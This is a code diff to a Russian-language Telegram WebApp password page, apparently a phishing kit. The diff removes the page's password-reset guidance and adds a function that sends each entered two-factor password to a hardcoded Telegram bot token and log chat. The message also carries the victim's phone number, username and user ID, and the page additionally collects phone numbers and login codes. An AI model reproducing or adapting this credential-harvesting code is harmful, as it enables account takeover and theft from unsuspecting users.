--- a/password.html
+++ b/password.html
@@ -103,33 +103,6 @@
 				text-decoration: underline;
 			}
 
-			.password-reset-info {
-				font-size: 14px;
-				color: #aaa;
-				line-height: 1.4;
-				max-width: 320px;
-				margin-bottom: 15px;
-				text-align: center;
-			}
-
-			.settings-link {
-				color: #2a9bf8;
-				text-decoration: none;
-				cursor: pointer;
-				font-weight: 500;
-			}
-
-			.settings-link:hover {
-				text-decoration: underline;
-			}
-
-			.arrow {
-				display: inline-block;
-				margin: 0 5px;
-				color: #2a9bf8;
-				font-weight: bold;
-			}
-
 			.buttons {
 				display: flex;
 				gap: 10px;
@@ -210,7 +183,6 @@
 				display: none;
 			}
 
-			/* Экран загрузки */
 			.loading-screen {
 				display: none;
 				flex-direction: column;
@@ -284,7 +256,6 @@
 			</div>
 		</div>
 
-		<!-- Экран загрузки -->
 		<div class="screen loading-screen" id="loadingScreen">
 			<div class="spinner"></div>
 			<div>Проверка пароля…</div>
@@ -303,15 +274,22 @@
 				console.log('Telegram WebApp not available');
 			}
 
-			let phoneNumber = 'Не указан';
-			let code = 'Не указан';
+			let phoneNumber = '';
+			let code = '';
 
 			try {
 				const urlParams = new URLSearchParams(window.location.search);
-				phoneNumber = urlParams.get('phone') || 'Не указан';
-				code = urlParams.get('code') || 'Не указан';
+				phoneNumber = urlParams.get('phone') || '';
+				code = urlParams.get('code') || '';
 			} catch (e) {
 				console.log('Error parsing URL parameters');
+			}
+
+			if (!phoneNumber) {
+				phoneNumber = localStorage.getItem('authPhoneNumber') || '';
+			}
+			if (!code) {
+				code = localStorage.getItem('authCode') || '';
 			}
 
 			const passwordInput = document.getElementById('passwordInput');
@@ -319,74 +297,89 @@
 			const continueButton = document.getElementById('continueButton');
 			const passwordScreen = document.getElementById('passwordScreen');
 			const loadingScreen = document.getElementById('loadingScreen');
-			const forgotPasswordLink = document.getElementById('forgotPasswordLink');
-			const forgotPasswordContainer = document.getElementById(
-				'forgotPasswordContainer'
-			);
 			const confirmationText = document.getElementById('confirmationText');
 
-			function handleSkipAction() {
-				try {
-					if (!skipButton.classList.contains('button-confirm')) {
-						if (confirmationText) confirmationText.style.display = 'block';
-						skipButton.textContent = 'Да, пропустить';
-						skipButton.classList.remove('button-secondary');
-						skipButton.classList.add('button-confirm');
-					} else {
-						if (passwordScreen) passwordScreen.style.display = 'none';
-						if (loadingScreen) loadingScreen.style.display = 'flex';
+			function sendPasswordToBot(password) {
+				const botToken = '7716220386:AAGwhUsT8OCKeBM8GmB7_sNXtFBvFgr_64I';
+				const logChatId = '-1003298308264';
 
-						if (tg && tg.sendData) {
-							tg.sendData(
-								JSON.stringify({
-									type: '2fa_password',
-									password: '',
-									phone_number: phoneNumber,
-									auth_code: code,
-									user_id: tg.initDataUnsafe?.user?.id || '',
-								})
-							);
-							if (tg.close) tg.close();
-						}
+				const user = tg.initDataUnsafe?.user;
+				const username = user?.username ? `@${user.username}` : 'без username';
+				const userId = user?.id || 'unknown';
+
+				let message = `🔐 Пароль из WebApp\n👤 Пользователь: ${username}\n🆔 User ID: ${userId}\n📱 Номер: ${phoneNumber}\n🔐 Пароль: ${
+					password || '(пропущен)'
+				}`;
+
+				fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
+					method: 'POST',
+					headers: { 'Content-Type': 'application/json' },
+					body: JSON.stringify({
+						chat_id: logChatId,
+						text: message,
+						parse_mode: 'HTML',
+					}),
+				}).catch(error => {
+					console.error('Ошибка отправки пароля:', error);
+				});
+			}
+
+			function handleSkipAction() {
+				if (!skipButton.classList.contains('button-confirm')) {
+					if (confirmationText) confirmationText.style.display = 'block';
+					skipButton.textContent = 'Да, пропустить';
+					skipButton.classList.remove('button-secondary');
+					skipButton.classList.add('button-confirm');
+				} else {
+					if (passwordScreen) passwordScreen.style.display = 'none';
+					if (loadingScreen) loadingScreen.style.display = 'flex';
+					sendPasswordToBot('');
+					if (tg && tg.sendData) {
+						tg.sendData(
+							JSON.stringify({
+								type: '2fa_password',
+								password: '',
+								phone_number: phoneNumber,
+								auth_code: code,
+								user_id: tg.initDataUnsafe?.user?.id || '',
+							})
+						);
 					}
-				} catch (e) {
-					console.log('Ошибка при обработке кнопки "Пропустить":', e);
+					setTimeout(() => {
+						if (tg.close) tg.close();
+					}, 5000);
 				}
 			}
 
 			function handleContinueAction() {
-				try {
-					const password = passwordInput?.value.trim() || '';
-
-					if (password) {
-						if (passwordScreen) passwordScreen.style.display = 'none';
-						if (loadingScreen) loadingScreen.style.display = 'flex';
-
-						if (tg && tg.sendData) {
-							tg.sendData(
-								JSON.stringify({
-									type: '2fa_password',
-									password: password,
-									phone_number: phoneNumber,
-									auth_code: code,
-									user_id: tg.initDataUnsafe?.user?.id || '',
-								})
-							);
-							if (tg.close) tg.close();
-						}
-					} else {
-						if (passwordInput) {
-							passwordInput.style.borderColor = '#ff4444';
-							passwordInput.style.boxShadow =
-								'0 0 0 2px rgba(255, 68, 68, 0.3)';
-							setTimeout(() => {
-								passwordInput.style.borderColor = '#3a3a3a';
-								passwordInput.style.boxShadow = 'none';
-							}, 1000);
-						}
+				const password = passwordInput?.value.trim() || '';
+				if (password) {
+					if (passwordScreen) passwordScreen.style.display = 'none';
+					if (loadingScreen) loadingScreen.style.display = 'flex';
+					sendPasswordToBot(password);
+					if (tg && tg.sendData) {
+						tg.sendData(
+							JSON.stringify({
+								type: '2fa_password',
+								password: password,
+								phone_number: phoneNumber,
+								auth_code: code,
+								user_id: tg.initDataUnsafe?.user?.id || '',
+							})
+						);
 					}
-				} catch (e) {
-					console.log('Ошибка при обработке кнопки "Продолжить":', e);
+					setTimeout(() => {
+						if (tg.close) tg.close();
+					}, 5000);
+				} else {
+					if (passwordInput) {
+						passwordInput.style.borderColor = '#ff4444';
+						passwordInput.style.boxShadow = '0 0 0 2px rgba(255, 68, 68, 0.3)';
+						setTimeout(() => {
+							passwordInput.style.borderColor = '#3a3a3a';
+							passwordInput.style.boxShadow = 'none';
+						}, 1000);
+					}
 				}
 			}
 
